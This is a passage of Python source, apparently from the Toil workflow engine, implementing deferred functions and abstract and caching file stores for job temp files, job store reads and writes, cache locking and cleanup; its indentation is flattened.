:param callable function: The deferred action to take in the form of a function
:param tuple args: Non-keyword arguments to the function
:param dict kwargs: Keyword arguments to the function
"""
# The general principle is to deserialize as late as possible, i.e. when the function is
# to be invoked, as that will avoid redundantly deserializing deferred functions for
# concurrently running jobs when the cache state is loaded from disk. By implication we
# should serialize as early as possible. We need to serialize the function as well as its
# arguments.
return cls(*list(map(dill.dumps, (function, args, kwargs))),
name=function.__name__,
module=ModuleDescriptor.forModule(function.__module__).globalize())
def invoke(self):
"""
Invoke the captured function with the captured arguments.
"""
logger.debug('Running deferred function %s.', self)
self.module.makeLoadable()
function, args, kwargs = list(map(dill.loads, (self.function, self.args, self.kwargs)))
return function(*args, **kwargs)
def __str__(self):
return '%s(%s, ...)' % (self.__class__.__name__, self.name)
__repr__ = __str__
class FileStore(with_metaclass(ABCMeta, object)):
"""
An abstract base class to represent the interface between a worker and the job store. Concrete
subclasses will be used to manage temporary files, read and write files from the job store and
log messages, passed as argument to the :meth:`toil.job.Job.run` method.
"""
# Variables used for syncing reads/writes
_pendingFileWritesLock = Semaphore()
_pendingFileWrites = set()
_terminateEvent = Event() # Used to signify crashes in threads
def __init__(self, jobStore, jobGraph, localTempDir, inputBlockFn):
self.jobStore = jobStore
self.jobGraph = jobGraph
self.localTempDir = os.path.abspath(localTempDir)
self.workFlowDir = os.path.dirname(self.localTempDir)
self.jobName = self.jobGraph.command.split()[1]
self.inputBlockFn = inputBlockFn
self.loggingMessages = []
self.filesToDelete = set()
self.jobsToDelete = set()
@staticmethod
def createFileStore(jobStore, jobGraph, localTempDir, inputBlockFn, caching):
fileStoreCls = CachingFileStore if caching else NonCachingFileStore
return fileStoreCls(jobStore, jobGraph, localTempDir, inputBlockFn)
@abstractmethod
@contextmanager
def open(self, job):
"""
The context manager used to conduct tasks prior-to, and after a job has been run.
:param toil.job.Job job: The job instance of the toil job to run.
"""
raise NotImplementedError()
# Functions related to temp files and directories
def getLocalTempDir(self):
"""
Get a new local temporary directory in which to write files that persist for the duration of
the job.
:return: The absolute path to a new local temporary directory. This directory will exist
for the duration of the job only, and is guaranteed to be deleted once the job
terminates, removing all files it contains recursively.
:rtype: str
"""
return os.path.abspath(tempfile.mkdtemp(prefix="t", dir=self.localTempDir))
def getLocalTempFile(self):
"""
Get a new local temporary file that will persist for the duration of the job.
:return: The absolute path to a local temporary file. This file will exist for the
duration of the job only, and is guaranteed to be deleted once the job terminates.
:rtype: str
"""
handle, tmpFile = tempfile.mkstemp(prefix="tmp", suffix=".tmp", dir=self.localTempDir)
os.close(handle)
return os.path.abspath(tmpFile)
def getLocalTempFileName(self):
"""
Get a valid name for a new local file. Don't actually create a file at the path.
:return: Path to valid file
:rtype: str
"""
# Create, and then delete a temp file. Creating will guarantee you a unique, unused
# file name. There is a very, very, very low chance that another job will create the
# same file name in the span of this one being deleted and then being used by the user.
tempFile = self.getLocalTempFile()
os.remove(tempFile)
return tempFile
# Functions related to reading, writing and removing files to/from the job store
@abstractmethod
def writeGlobalFile(self, localFileName, cleanup=False):
"""
Takes a file (as a path) and uploads it to the job store.
:param string localFileName: The path to the local file to upload.
:param bool cleanup: if True then the copy of the global file will be deleted once the
job and all its successors have completed running. If not the global file must be
deleted manually.
:return: an ID that can be used to retrieve the file.
:rtype: toil.fileStore.FileID
"""
raise NotImplementedError()
def writeGlobalFileStream(self, cleanup=False):
"""
Similar to writeGlobalFile, but allows the writing of a stream to the job store.
The yielded file handle does not need to and should not be closed explicitly.
:param bool cleanup: is as in :func:`toil.fileStore.FileStore.writeGlobalFile`.
:return: A context manager yielding a tuple of
1) a file handle which can be written to and
2) the ID of the resulting file in the job store.
"""
# TODO: Make this work with FileID
return self.jobStore.writeFileStream(None if not cleanup else self.jobGraph.jobStoreID)
@abstractmethod
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
"""
Makes the file associated with fileStoreID available locally. If mutable is True,
then a copy of the file will be created locally so that the original is not modified
and does not change the file for other jobs. If mutable is False, then a link can
be created to the file, saving disk resources.
If a user path is specified, it is used as the destination. If a user path isn't
specified, the file is stored in the local temp directory with an encoded name.
:param toil.fileStore.FileID fileStoreID: job store id for the file
:param string userPath: a path to the name of file to which the global file will be copied
or hard-linked (see below).
:param bool cache: Described in :func:`toil.fileStore.CachingFileStore.readGlobalFile`
:param bool mutable: Described in :func:`toil.fileStore.CachingFileStore.readGlobalFile`
:return: An absolute path to a local, temporary copy of the file keyed by fileStoreID.
:rtype: str
"""
raise NotImplementedError()
@abstractmethod
def readGlobalFileStream(self, fileStoreID):
"""
Similar to readGlobalFile, but allows a stream to be read from the job store. The yielded
file handle does not need to and should not be closed explicitly.
:return: a context manager yielding a file handle which can be read from.
"""
raise NotImplementedError()
@abstractmethod
def deleteLocalFile(self, fileStoreID):
"""
Deletes Local copies of files associated with the provided job store ID.
:param str fileStoreID: File Store ID of the file to be deleted.
"""
raise NotImplementedError()
@abstractmethod
def deleteGlobalFile(self, fileStoreID):
"""
Deletes local files with the provided job store ID and then permanently deletes them from
the job store. To ensure that the job can be restarted if necessary, the delete will not
happen until after the job's run method has completed.
:param fileStoreID: the job store ID of the file to be deleted.
"""
raise NotImplementedError()
# Functions used to read and write files directly between a source url and the job store.
def importFile(self, srcUrl, sharedFileName=None):
return self.jobStore.importFile(srcUrl, sharedFileName=sharedFileName)
def exportFile(self, jobStoreFileID, dstUrl):
raise NotImplementedError()
# A utility method for accessing filenames
def _resolveAbsoluteLocalPath(self, filePath):
"""
Return the absolute path to filePath. This is a wrapper for os.path.abspath because mac OS
symlinks /tmp and /var (the most common places for a default tempdir) to /private/tmp and
/private/var respectively.
:param str filePath: The absolute or relative path to the file. If relative, it must be
relative to the local temp working dir
:return: Absolute path to key
:rtype: str
"""
if os.path.isabs(filePath):
return os.path.abspath(filePath)
else:
return os.path.join(self.localTempDir, filePath)
class _StateFile(object):
"""
Utility class to read and write dill-ed state dictionaries from/to a file into a namespace.
"""
def __init__(self, stateDict):
assert isinstance(stateDict, dict)
self.__dict__.update(stateDict)
@abstractclassmethod
@contextmanager
def open(cls, outer=None):
"""
            This is a context manager that loads the state file and reads it into an object
            that is returned to the user in the yield.
:param outer: Instance of the calling class (to use outer methods).
"""
raise NotImplementedError()
@classmethod
def _load(cls, fileName):
"""
Load the state of the cache from the state file
:param str fileName: Path to the cache state file.
:return: An instance of the state as a namespace.
:rtype: _StateFile
"""
# Read the value from the cache state file then initialize and instance of
# _CacheState with it.
with open(fileName, 'rb') as fH:
infoDict = dill.load(fH)
return cls(infoDict)
def write(self, fileName):
"""
Write the current state into a temporary file then atomically rename it to the main
state file.
:param str fileName: Path to the state file.
"""
with open(fileName + '.tmp', 'wb') as fH:
# Based on answer by user "Mark" at:
# http://stackoverflow.com/questions/2709800/how-to-pickle-yourself
# We can't pickle nested classes. So we have to pickle the variables of the class
# If we ever change this, we need to ensure it doesn't break FileID
dill.dump(self.__dict__, fH)
os.rename(fileName + '.tmp', fileName)
# Methods related to the deferred function logic
@abstractclassmethod
def findAndHandleDeadJobs(cls, nodeInfo, batchSystemShutdown=False):
"""
This function looks at the state of all jobs registered on the node and will handle them
        (clean up their presence on the node, and run any registered deferred functions)
:param nodeInfo: Information regarding the node required for identifying dead jobs.
:param bool batchSystemShutdown: Is the batch system in the process of shutting down?
"""
raise NotImplementedError()
@abstractmethod
def _registerDeferredFunction(self, deferredFunction):
"""
Register the given deferred function with this job.
:param DeferredFunction deferredFunction: the function to register
"""
raise NotImplementedError()
@staticmethod
def _runDeferredFunctions(deferredFunctions):
"""
Invoke the specified deferred functions and return a list of names of functions that
raised an exception while being invoked.
:param list[DeferredFunction] deferredFunctions: the DeferredFunctions to run
:rtype: list[str]
"""
failures = []
for deferredFunction in deferredFunctions:
try:
deferredFunction.invoke()
except:
failures.append(deferredFunction.name)
logger.exception('%s failed.', deferredFunction)
return failures
# Functions related to logging
def logToMaster(self, text, level=logging.INFO):
"""
Send a logging message to the leader. The message will also be \
logged by the worker at the same level.
:param text: The string to log.
:param int level: The logging level.
"""
logger.log(level=level, msg=("LOG-TO-MASTER: " + text))
self.loggingMessages.append(dict(text=text, level=level))
# Functions run after the completion of the job.
@abstractmethod
def _updateJobWhenDone(self):
"""
Update the status of the job on the disk.
"""
raise NotImplementedError()
@abstractmethod
def _blockFn(self):
"""
Blocks while _updateJobWhenDone is running. This function is called by this job's
successor to ensure that it does not begin modifying the job store until after this job has
finished doing so.
"""
raise NotImplementedError()
# Utility function used to identify if a pid is still running on the node.
@staticmethod
def _pidExists(pid):
"""
This will return True if the process associated with pid is still running on the machine.
This is based on stackoverflow question 568271.
:param int pid: ID of the process to check for
:return: True/False
:rtype: bool
"""
assert pid > 0
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
else:
raise
else:
return True
@abstractclassmethod
def shutdown(cls, dir_):
"""
Shutdown the filestore on this node.
This is intended to be called on batch system shutdown.
        :param dir_: The directory containing the required information for fixing the state
            of failed workers on the node before cleaning up.
"""
raise NotImplementedError()
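# A worker-side sketch of the intended call pattern (illustrative only, not part
# of the original module; in practice worker.py builds the file store via
# FileStore.createFileStore and passes the real job instance).
def _exampleUseFileStore(fileStore, job, inputPath):
    with fileStore.open(job):
        # Upload a local file; cleanup=True ties its lifetime to the job graph.
        fileID = fileStore.writeGlobalFile(inputPath, cleanup=True)
        # Read it back; with mutable=False a hard link may be used to save disk.
        localCopy = fileStore.readGlobalFile(fileID, cache=True, mutable=False)
        return fileID, localCopy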
class CachingFileStore(FileStore):
"""
A cache-enabled file store that attempts to use hard-links and asynchronous job store writes to
reduce I/O between, and during jobs.
"""
def __init__(self, jobStore, jobGraph, localTempDir, inputBlockFn):
super(CachingFileStore, self).__init__(jobStore, jobGraph, localTempDir, inputBlockFn)
# Variables related to asynchronous writes.
self.workerNumber = 2
self.queue = Queue()
self.updateSemaphore = Semaphore()
self.workers = [Thread(target=self.asyncWrite) for i in range(self.workerNumber)]
for worker in self.workers:
worker.start()
# Variables related to caching
# cacheDir has to be 1 levels above local worker tempdir, at the same level as the
# worker dirs. At this point, localTempDir is the worker directory, not the job
# directory.
self.localCacheDir = os.path.join(os.path.dirname(localTempDir),
cacheDirName(self.jobStore.config.workflowID))
self.cacheLockFile = os.path.join(self.localCacheDir, '.cacheLock')
self.cacheStateFile = os.path.join(self.localCacheDir, '_cacheState')
        # Since each worker has its own unique CachingFileStore instance, and only one Job can run
# at a time on a worker, we can bookkeep the job's file store operated files in a
# dictionary.
self.jobSpecificFiles = {}
self.jobName = str(self.jobGraph)
self.jobID = sha1(self.jobName.encode('utf-8')).hexdigest()
logger.debug('Starting job (%s) with ID (%s).', self.jobName, self.jobID)
# A variable to describe how many hard links an unused file in the cache will have.
self.nlinkThreshold = None
self.workflowAttemptNumber = self.jobStore.config.workflowAttemptNumber
# This is a flag to better resolve cache equation imbalances at cleanup time.
self.cleanupInProgress = False
# Now that we've setup all the required variables, setup the cache directory for the
# job if required.
self._setupCache()
@contextmanager
def open(self, job):
"""
This context manager decorated method allows cache-specific operations to be conducted
before and after the execution of a job in worker.py
"""
# Create a working directory for the job
startingDir = os.getcwd()
self.localTempDir = makePublicDir(os.path.join(self.localTempDir, str(uuid.uuid4())))
# Check the status of all jobs on this node. If there are jobs that started and died before
# cleaning up their presence from the cache state file, restore the cache file to a state
# where the jobs don't exist.
with self._CacheState.open(self) as cacheInfo:
self.findAndHandleDeadJobs(cacheInfo)
# While we have a lock on the cache file, run a naive check to see if jobs on this node
# have greatly gone over their requested limits.
if cacheInfo.sigmaJob < 0:
logger.warning('Detecting that one or more jobs on this node have used more '
                               'resources than requested. Turn on debug logs to see more '
'information on cache usage.')
# Get the requirements for the job and clean the cache if necessary. cleanCache will
# ensure that the requirements for this job are stored in the state file.
jobReqs = job.disk
# Cleanup the cache to free up enough space for this job (if needed)
self.cleanCache(jobReqs)
try:
os.chdir(self.localTempDir)
yield
finally:
diskUsed = getDirSizeRecursively(self.localTempDir)
logString = ("Job {jobName} used {percent:.2f}% ({humanDisk}B [{disk}B] used, "
"{humanRequestedDisk}B [{requestedDisk}B] requested) at the end of "
"its run.".format(jobName=self.jobName,
percent=(float(diskUsed) / jobReqs * 100 if
jobReqs > 0 else 0.0),
humanDisk=bytes2human(diskUsed),
disk=diskUsed,
humanRequestedDisk=bytes2human(jobReqs),
requestedDisk=jobReqs))
self.logToMaster(logString, level=logging.DEBUG)
if diskUsed > jobReqs:
self.logToMaster("Job used more disk than requested. Please reconsider modifying "
"the user script to avoid the chance of failure due to "
"incorrectly requested resources. " + logString,
level=logging.WARNING)
os.chdir(startingDir)
self.cleanupInProgress = True
# Delete all the job specific files and return sizes to jobReqs
self.returnJobReqs(jobReqs)
with self._CacheState.open(self) as cacheInfo:
# Carry out any user-defined cleanup actions
deferredFunctions = cacheInfo.jobState[self.jobID]['deferredFunctions']
failures = self._runDeferredFunctions(deferredFunctions)
for failure in failures:
self.logToMaster('Deferred function "%s" failed.' % failure, logging.WARN)
# Finally delete the job from the cache state file
cacheInfo.jobState.pop(self.jobID)
# Functions related to reading, writing and removing files to/from the job store
def writeGlobalFile(self, localFileName, cleanup=False):
"""
Takes a file (as a path) and uploads it to the job store. Depending on the jobstore
used, carry out the appropriate cache functions.
"""
absLocalFileName = self._resolveAbsoluteLocalPath(localFileName)
        # If cleanup is requested, register the file against this job's jobStoreID so it is
        # removed once the job and all its successors have completed.
cleanupID = None if not cleanup else self.jobGraph.jobStoreID
# If the file is from the scope of local temp dir
if absLocalFileName.startswith(self.localTempDir):
# If the job store is of type FileJobStore and the job store and the local temp dir
# are on the same file system, then we want to hard link the files instead of copying
# barring the case where the file being written was one that was previously read
# from the file store. In that case, you want to copy to the file store so that
# the two have distinct nlink counts.
# Can read without a lock because we're only reading job-specific info.
jobSpecificFiles = list(self._CacheState._load(self.cacheStateFile).jobState[
self.jobID]['filesToFSIDs'].keys())
# Saying nlink is 2 implicitly means we are using the job file store, and it is on
# the same device as the work dir.
if self.nlinkThreshold == 2 and absLocalFileName not in jobSpecificFiles:
jobStoreFileID = self.jobStore.getEmptyFileStoreID(cleanupID)
# getEmptyFileStoreID creates the file in the scope of the job store hence we
# need to delete it before linking.
os.remove(self.jobStore._getAbsPath(jobStoreFileID))
os.link(absLocalFileName, self.jobStore._getAbsPath(jobStoreFileID))
# If they're not on the file system, or if the file is already linked with an
# existing file, we need to copy to the job store.
# Check if the user allows asynchronous file writes
elif self.jobStore.config.useAsync:
jobStoreFileID = self.jobStore.getEmptyFileStoreID(cleanupID)
# Before we can start the async process, we should also create a dummy harbinger
# file in the cache such that any subsequent jobs asking for this file will not
# attempt to download it from the job store till the write is complete. We do
# this now instead of in the writing thread because there is an edge case where
# readGlobalFile in a subsequent job is called before the writing thread has
# received the message to write the file and has created the dummy harbinger
# (and the file was unable to be cached/was evicted from the cache).
harbingerFile = self.HarbingerFile(self, fileStoreID=jobStoreFileID)
harbingerFile.write()
fileHandle = open(absLocalFileName, 'rb')
with self._pendingFileWritesLock:
self._pendingFileWrites.add(jobStoreFileID)
# A file handle added to the queue allows the asyncWrite threads to remove their
# jobID from _pendingFileWrites. Therefore, a file should only be added after
# its fileID is added to _pendingFileWrites
self.queue.put((fileHandle, jobStoreFileID))
# Else write directly to the job store.
else:
jobStoreFileID = self.jobStore.writeFile(absLocalFileName, cleanupID)
# Local files are cached by default, unless they were written from previously read
# files.
if absLocalFileName not in jobSpecificFiles:
self.addToCache(absLocalFileName, jobStoreFileID, 'write')
else:
self._JobState.updateJobSpecificFiles(self, jobStoreFileID, absLocalFileName,
0.0, False)
# Else write directly to the job store.
else:
jobStoreFileID = self.jobStore.writeFile(absLocalFileName, cleanupID)
# Non local files are NOT cached by default, but they are tracked as local files.
self._JobState.updateJobSpecificFiles(self, jobStoreFileID, None,
0.0, False)
return FileID.forPath(jobStoreFileID, absLocalFileName)
def writeGlobalFileStream(self, cleanup=False):
# TODO: Make this work with caching
return super(CachingFileStore, self).writeGlobalFileStream(cleanup)
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
"""
Downloads a file described by fileStoreID from the file store to the local directory.
The function first looks for the file in the cache and if found, it hardlinks to the
cached copy instead of downloading.
The cache parameter will be used only if the file isn't already in the cache, and
        the provided user path (if specified) is within the scope of the local temp dir.
:param bool cache: If True, a copy of the file will be saved into a cache that can be
used by other workers. caching supports multiple concurrent workers requesting the
same file by allowing only one to download the file while the others wait for it to
complete.
:param bool mutable: If True, the file path returned points to a file that is
modifiable by the user. Using False is recommended as it saves disk by making
multiple workers share a file via hard links. The default is False.
"""
# Check that the file hasn't been deleted by the user
if fileStoreID in self.filesToDelete:
raise RuntimeError('Trying to access a file in the jobStore you\'ve deleted: ' + \
'%s' % fileStoreID)
# Get the name of the file as it would be in the cache
cachedFileName = self.encodedFileID(fileStoreID)
# setup the harbinger variable for the file. This is an identifier that the file is
# currently being downloaded by another job and will be in the cache shortly. It is used
# to prevent multiple jobs from simultaneously downloading the same file from the file
# store.
harbingerFile = self.HarbingerFile(self, cachedFileName=cachedFileName)
# setup the output filename. If a name is provided, use it - This makes it a Named
# Local File. If a name isn't provided, use the base64 encoded name such that we can
# easily identify the files later on.
if userPath is not None:
localFilePath = self._resolveAbsoluteLocalPath(userPath)
if os.path.exists(localFilePath):
# yes, this is illegal now.
raise RuntimeError(' File %s ' % localFilePath + ' exists. Cannot Overwrite.')
fileIsLocal = True if localFilePath.startswith(self.localTempDir) else False
else:
localFilePath = self.getLocalTempFileName()
fileIsLocal = True
# First check whether the file is in cache. If it is, then hardlink the file to
# userPath. Cache operations can only occur on local files.
with self.cacheLock() as lockFileHandle:
if fileIsLocal and self._fileIsCached(fileStoreID):
logger.debug('CACHE: Cache hit on file with ID \'%s\'.' % fileStoreID)
assert not os.path.exists(localFilePath)
if mutable:
shutil.copyfile(cachedFileName, localFilePath)
cacheInfo = self._CacheState._load(self.cacheStateFile)
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.addToJobSpecFiles(fileStoreID, localFilePath, -1, None)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
else:
os.link(cachedFileName, localFilePath)
self.returnFileSize(fileStoreID, localFilePath, lockFileHandle,
fileAlreadyCached=True)
# If the file is not in cache, check whether the .harbinger file for the given
# FileStoreID exists. If it does, the wait and periodically check for the removal
# of the file and the addition of the completed download into cache of the file by
# the other job. Then we link to it.
elif fileIsLocal and harbingerFile.exists():
harbingerFile.waitOnDownload(lockFileHandle)
# If the code reaches here, the harbinger file has been removed. This means
# either the file was successfully downloaded and added to cache, or something
# failed. To prevent code duplication, we recursively call readGlobalFile.
flock(lockFileHandle, LOCK_UN)
return self.readGlobalFile(fileStoreID, userPath=userPath, cache=cache,
mutable=mutable)
# If the file is not in cache, then download it to the userPath and then add to
# cache if specified.
else:
logger.debug('CACHE: Cache miss on file with ID \'%s\'.' % fileStoreID)
if fileIsLocal and cache:
# If caching of the downloaded file is desired, First create the harbinger
# file so other jobs know not to redundantly download the same file. Write
# the PID of this process into the file so other jobs know who is carrying
# out the download.
harbingerFile.write()
# Now release the file lock while the file is downloaded as download could
# take a while.
flock(lockFileHandle, LOCK_UN)
# Use try:finally: so that the .harbinger file is removed whether the
# download succeeds or not.
try:
self.jobStore.readFile(fileStoreID,
'/.'.join(os.path.split(cachedFileName)))
except:
if os.path.exists('/.'.join(os.path.split(cachedFileName))):
os.remove('/.'.join(os.path.split(cachedFileName)))
raise
else:
# If the download succeded, officially add the file to cache (by
# recording it in the cache lock file) if possible.
if os.path.exists('/.'.join(os.path.split(cachedFileName))):
os.rename('/.'.join(os.path.split(cachedFileName)), cachedFileName)
self.addToCache(localFilePath, fileStoreID, 'read', mutable)
# We don't need to return the file size here because addToCache
# already does it for us
finally:
# In any case, delete the harbinger file.
harbingerFile.delete()
else:
# Release the cache lock since the remaining stuff is not cache related.
flock(lockFileHandle, LOCK_UN)
self.jobStore.readFile(fileStoreID, localFilePath)
os.chmod(localFilePath, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
# Now that we have the file, we have 2 options. It's modifiable or not.
# Either way, we need to account for FileJobStore making links instead of
# copies.
if mutable:
if self.nlinkThreshold == 2:
# nlinkThreshold can only be 1 or 2 and it can only be 2 iff the
# job store is FilejobStore, and the job store and local temp dir
# are on the same device. An atomic rename removes the nlink on the
# file handle linked from the job store.
shutil.copyfile(localFilePath, localFilePath + '.tmp')
os.rename(localFilePath + '.tmp', localFilePath)
self._JobState.updateJobSpecificFiles(self, fileStoreID, localFilePath,
-1, False)
# If it was immutable
else:
if self.nlinkThreshold == 2:
self._accountForNlinkEquals2(localFilePath)
self._JobState.updateJobSpecificFiles(self, fileStoreID, localFilePath,
0.0, False)
return localFilePath
def exportFile(self, jobStoreFileID, dstUrl):
while jobStoreFileID in self._pendingFileWrites:
            # The file is still being written to the job store - wait for this process to finish prior to
# exporting it
time.sleep(1)
self.jobStore.exportFile(jobStoreFileID, dstUrl)
def readGlobalFileStream(self, fileStoreID):
if fileStoreID in self.filesToDelete:
raise RuntimeError(
"Trying to access a file in the jobStore you've deleted: %s" % fileStoreID)
# If fileStoreID is in the cache provide a handle from the local cache
if self._fileIsCached(fileStoreID):
logger.debug('CACHE: Cache hit on file with ID \'%s\'.' % fileStoreID)
return open(self.encodedFileID(fileStoreID), 'rb')
else:
logger.debug('CACHE: Cache miss on file with ID \'%s\'.' % fileStoreID)
return self.jobStore.readFileStream(fileStoreID)
def deleteLocalFile(self, fileStoreID):
# The local file may or may not have been cached. If it was, we need to do some
        # bookkeeping. If it wasn't, we just delete the file and continue, though we might need
        # some bookkeeping if the file store and cache live on the same filesystem. We can know
# if a file was cached or not based on the value held in the third tuple value for the
# dict item having key = fileStoreID. If it was cached, it holds the value True else
# False.
with self._CacheState.open(self) as cacheInfo:
jobState = self._JobState(cacheInfo.jobState[self.jobID])
if fileStoreID not in list(jobState.jobSpecificFiles.keys()):
                # ENOENT indicates that the file did not exist
raise OSError(errno.ENOENT, "Attempting to delete a non-local file")
# filesToDelete is a dictionary of file: fileSize
filesToDelete = jobState.jobSpecificFiles[fileStoreID]
allOwnedFiles = jobState.filesToFSIDs
for (fileToDelete, fileSize) in list(filesToDelete.items()):
# Handle the case where a file not in the local temp dir was written to
# filestore
if fileToDelete is None:
filesToDelete.pop(fileToDelete)
allOwnedFiles[fileToDelete].remove(fileStoreID)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
continue
# If the file size is zero (copied into the local temp dir) or -1 (mutable), we
# can safely delete without any bookkeeping
if fileSize in (0, -1):
# Only remove the file if there is only one FSID associated with it.
if len(allOwnedFiles[fileToDelete]) == 1:
try:
os.remove(fileToDelete)
except OSError as err:
if err.errno == errno.ENOENT and fileSize == -1:
logger.debug('%s was read mutably and deleted by the user',
fileToDelete)
else:
raise IllegalDeletionCacheError(fileToDelete)
allOwnedFiles[fileToDelete].remove(fileStoreID)
filesToDelete.pop(fileToDelete)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
continue
# If not, we need to do bookkeeping
# Get the size of the file to be deleted, and the number of jobs using the file
# at the moment.
if not os.path.exists(fileToDelete):
raise IllegalDeletionCacheError(fileToDelete)
fileStats = os.stat(fileToDelete)
if fileSize != fileStats.st_size:
logger.warn("the size on record differed from the real size by " +
"%s bytes" % str(fileSize - fileStats.st_size))
# Remove the file and return file size to the job
if len(allOwnedFiles[fileToDelete]) == 1:
os.remove(fileToDelete)
cacheInfo.sigmaJob += fileSize
filesToDelete.pop(fileToDelete)
allOwnedFiles[fileToDelete].remove(fileStoreID)
jobState.updateJobReqs(fileSize, 'remove')
cacheInfo.jobState[self.jobID] = jobState.__dict__
# If the job is not in the process of cleaning up, then we may need to remove the
# cached copy of the file as well.
if not self.cleanupInProgress:
# If the file is cached and if other jobs are using the cached copy of the file,
# or if retaining the file in the cache doesn't affect the cache equation, then
# don't remove it from cache.
if self._fileIsCached(fileStoreID):
cachedFile = self.encodedFileID(fileStoreID)
jobsUsingFile = os.stat(cachedFile).st_nlink
if not cacheInfo.isBalanced() and jobsUsingFile == self.nlinkThreshold:
os.remove(cachedFile)
cacheInfo.cached -= fileSize
self.logToMaster('Successfully deleted cached copy of file with ID '
'\'%s\'.' % fileStoreID, level=logging.DEBUG)
self.logToMaster('Successfully deleted local copies of file with ID '
'\'%s\'.' % fileStoreID, level=logging.DEBUG)
def deleteGlobalFile(self, fileStoreID):
jobStateIsPopulated = False
with self._CacheState.open(self) as cacheInfo:
if self.jobID in cacheInfo.jobState:
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobStateIsPopulated = True
if jobStateIsPopulated and fileStoreID in list(jobState.jobSpecificFiles.keys()):
# Use deleteLocalFile in the backend to delete the local copy of the file.
self.deleteLocalFile(fileStoreID)
# At this point, the local file has been deleted, and possibly the cached copy. If
# the cached copy exists, it is either because another job is using the file, or
# because retaining the file in cache doesn't unbalance the caching equation. The
# first case is unacceptable for deleteGlobalFile and the second requires explicit
# deletion of the cached copy.
# Check if the fileStoreID is in the cache. If it is, ensure only the current job is
# using it.
cachedFile = self.encodedFileID(fileStoreID)
if os.path.exists(cachedFile):
self.removeSingleCachedFile(fileStoreID)
# Add the file to the list of files to be deleted once the run method completes.
self.filesToDelete.add(fileStoreID)
self.logToMaster('Added file with ID \'%s\' to the list of files to be' % fileStoreID +
' globally deleted.', level=logging.DEBUG)
# Cache related methods
@contextmanager
def cacheLock(self):
"""
This is a context manager to acquire a lock on the Lock file that will be used to
prevent synchronous cache operations between workers.
:yields: File descriptor for cache lock file in w mode
"""
cacheLockFile = open(self.cacheLockFile, 'w')
try:
flock(cacheLockFile, LOCK_EX)
logger.debug("CACHE: Obtained lock on file %s" % self.cacheLockFile)
yield cacheLockFile
except IOError:
logger.critical('CACHE: Unable to acquire lock on %s' % self.cacheLockFile)
raise
finally:
cacheLockFile.close()
logger.debug("CACHE: Released lock")
def _setupCache(self):
"""
Setup the cache based on the provided values for localCacheDir.
"""
# we first check whether the cache directory exists. If it doesn't, create it.
if not os.path.exists(self.localCacheDir):
# Create a temporary directory as this worker's private cache. If all goes well, it
# will be renamed into the cache for this node.
personalCacheDir = ''.join([os.path.dirname(self.localCacheDir), '/.ctmp-',
str(uuid.uuid4())])
os.mkdir(personalCacheDir, 0o755)
self._createCacheLockFile(personalCacheDir)
try:
os.rename(personalCacheDir, self.localCacheDir)
except OSError as err:
                # The only acceptable FAIL case is that the destination is a non-empty
                # directory. Assuming (it's ambiguous) atomic renaming of directories, if the
# dst is non-empty, it only means that another worker has beaten this one to the
# rename.
if err.errno == errno.ENOTEMPTY:
# Cleanup your own mess. It's only polite.
shutil.rmtree(personalCacheDir)
else:
raise
# You can't reach here unless a local cache directory has been created successfully
with self._CacheState.open(self) as cacheInfo:
# Ensure this cache is from the correct attempt at the workflow! If it isn't, we
# need to reset the cache lock file
if cacheInfo.attemptNumber != self.workflowAttemptNumber:
if cacheInfo.nlink == 2:
cacheInfo.cached = 0 # cached file sizes are accounted for by job store
else:
allCachedFiles = [os.path.join(self.localCacheDir, x)
for x in os.listdir(self.localCacheDir)
if not self._isHidden(x)]
cacheInfo.cached = sum([os.stat(cachedFile).st_size
for cachedFile in allCachedFiles])
# TODO: Delete the working directories
cacheInfo.sigmaJob = 0
cacheInfo.attemptNumber = self.workflowAttemptNumber
self.nlinkThreshold = cacheInfo.nlink
def _createCacheLockFile(self, tempCacheDir):
"""
        Create the cache lock file to contain the state of the cache on the node.
:param str tempCacheDir: Temporary directory to use for setting up a cache lock file the
first time.
"""
# The nlink threshold is setup along with the first instance of the cache class on the
# node.
self.setNlinkThreshold()
# Get the free space on the device
freeSpace, _ = getFileSystemSize(tempCacheDir)
# Create the cache lock file.
open(os.path.join(tempCacheDir, os.path.basename(self.cacheLockFile)), 'w').close()
# Setup the cache state file
personalCacheStateFile = os.path.join(tempCacheDir,
os.path.basename(self.cacheStateFile))
# Setup the initial values for the cache state file in a dict
cacheInfo = self._CacheState({
'nlink': self.nlinkThreshold,
'attemptNumber': self.workflowAttemptNumber,
'total': freeSpace,
'cached': 0,
'sigmaJob': 0,
'cacheDir': self.localCacheDir,
'jobState': {}})
cacheInfo.write(personalCacheStateFile)
def encodedFileID(self, jobStoreFileID):
"""
Uses a url safe base64 encoding to encode the jobStoreFileID into a unique identifier to
use as filename within the cache folder. jobstore IDs are essentially urls/paths to
files and thus cannot be used as is. Base64 encoding is used since it is reversible.
:param jobStoreFileID: string representing a job store file ID
:return: outCachedFile: A path to the hashed file in localCacheDir
:rtype: str
"""
base64Text = base64.urlsafe_b64encode(jobStoreFileID.encode('utf-8')).decode('utf-8')
outCachedFile = os.path.join(self.localCacheDir, base64Text)
return outCachedFile
def _fileIsCached(self, jobStoreFileID):
"""
Is the file identified by jobStoreFileID in cache or not.
"""
return os.path.exists(self.encodedFileID(jobStoreFileID))
def decodedFileID(self, cachedFilePath):
"""
Decode a cached fileName back to a job store file ID.
:param str cachedFilePath: Path to the cached file
:return: The jobstore file ID associated with the file
:rtype: str
"""
fileDir, fileName = os.path.split(cachedFilePath)
assert fileDir == self.localCacheDir, 'Can\'t decode uncached file names'
# We encode and decode here because base64 can't work with unencoded text
        # It's probably worth, later, converting all file name variables to bytes
# and not text.
return base64.urlsafe_b64decode(fileName.encode('utf-8')).decode('utf-8')
def addToCache(self, localFilePath, jobStoreFileID, callingFunc, mutable=False):
"""
Used to process the caching of a file. This depends on whether a file is being written
to file store, or read from it.
WRITING
The file is in localTempDir. It needs to be linked into cache if possible.
READING
The file is already in the cache dir. Depending on whether it is modifiable or not, does
